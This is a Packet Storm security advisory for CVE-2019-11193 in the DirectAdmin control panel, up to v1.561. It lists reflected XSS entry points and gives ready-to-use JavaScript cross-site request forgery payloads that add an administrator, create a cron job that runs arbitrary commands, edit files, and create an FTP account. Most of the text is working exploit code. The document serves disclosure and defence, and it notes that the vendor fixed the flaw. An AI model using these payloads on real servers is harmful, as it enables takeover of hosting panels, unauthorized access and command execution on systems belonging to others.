DirectAdmin 1.561 Cross Site Scripting

2019-04-12T00:00:00
ID PACKETSTORM:152494
Type packetstorm
Reporter Numan OZDEMIR
Modified 2019-04-12T00:00:00

Description

                                        
                                            `# Title: DirectAdmin Multiple Vulnerabilities to Takeover the Server <=   
v1.561  
# Date: 12.04.2019  
# Author: Numan OZDEMIR  
# Vendor Homepage: https://www.directadmin.com/  
# Version: Up to v1.561.  
# CVE: CVE-2019-11193  
# info@infinitumit.com.tr && root@numanozdemir.com  
# Detailed: https://numanozdemir.com/respdisc/directadmin.pdf  
  
# Description:  
# Multiple security vulnerabilities has been discovered in popular   
server control panel DirectAdmin, by  
# InfinitumIT. Attackers can combine those security vulnerabilities and   
do a lot of critical action like server control takeover.  
# Those vulnerabilities (Cross Site Scripting and Cross Site Request   
Forgery) may cause them to happen:  
# Add administrator, execute command remote (RCE), Full Backup the   
Server and Upload the Own Server, webshell upload and more.  
  
# Reflected XSS Vulnerabilities:  
# https://SERVERIP:2222/CMD_FILE_MANAGER/XSS-PAYLOAD  
# https://SERVERIP:2222/CMD_SHOW_USER?user=XSS-PAYLOAD  
# https://SERVERIP:2222/CMD_SHOW_RESELLER?user=XSS-PAYLOAD  
  
# Example Payloads:  
# Add Administrator:  
var url = "http://SERVERIP:2222/CMD_ACCOUNT_ADMIN";  
var params =  
"fakeusernameremembered=&fakepasswordremembered=&action=create&username=username&emai  
l=test%40test.com&passwd=password&passwd2=password&notify=ye";  
var vuln = new XMLHttpRequest();  
vuln.open("POST", url, true);  
vuln.withCredentials = 'true';  
vuln.setRequestHeader("Content-type",  
"application/x-www-form-urlencoded");  
vuln.send(params);  
  
# Remote Command Execution by Cron Jobs:  
var url = "http://SERVERIP:2222/CMD_CRON_JOBS";  
var params =  
"action=create&minute=*&hour=*&dayofmonth=*&month=*&dayofweek=*&command=command";  
var vuln = new XMLHttpRequest();  
vuln.open("POST", url, true);  
vuln.withCredentials = 'true';  
vuln.setRequestHeader("Content-type",  
"application/x-www-form-urlencoded");  
vuln.send(params);  
  
# Edit File:  
var url = "http://SERVERIP:2222/CMD_ADMIN_FILE_EDITOR";  
var params = "file=the-file-full-path&action=save&text=new-content";  
var vuln = new XMLHttpRequest();  
vuln.open("POST", url, true);  
vuln.withCredentials = 'true';  
vuln.setRequestHeader("Content-type",  
"application/x-www-form-urlencoded");  
vuln.send(params);  
  
# Create FTP Account:  
var url = "http://SERVERIP:2222/CMD_FTP";  
var params =  
"fakeusernameremembered=&fakepasswordremembered=&action=create&domain=infinitumit.com.tr  
&user=username&passwd=password&random=Save+Password&passwd2=password&type=domain&cu  
stom_val=%2Fhome%2Fusername&create=Create";  
var vuln = new XMLHttpRequest();  
vuln.open("POST", url, true);  
vuln.withCredentials = 'true';  
vuln.setRequestHeader("Content-type",  
"application/x-www-form-urlencoded");  
vuln.send(params);  
  
  
# Vulnerabilities are fixed in minutes, thanks to DirectAdmin.  
# InfinitumIT / For safer days...  
  
`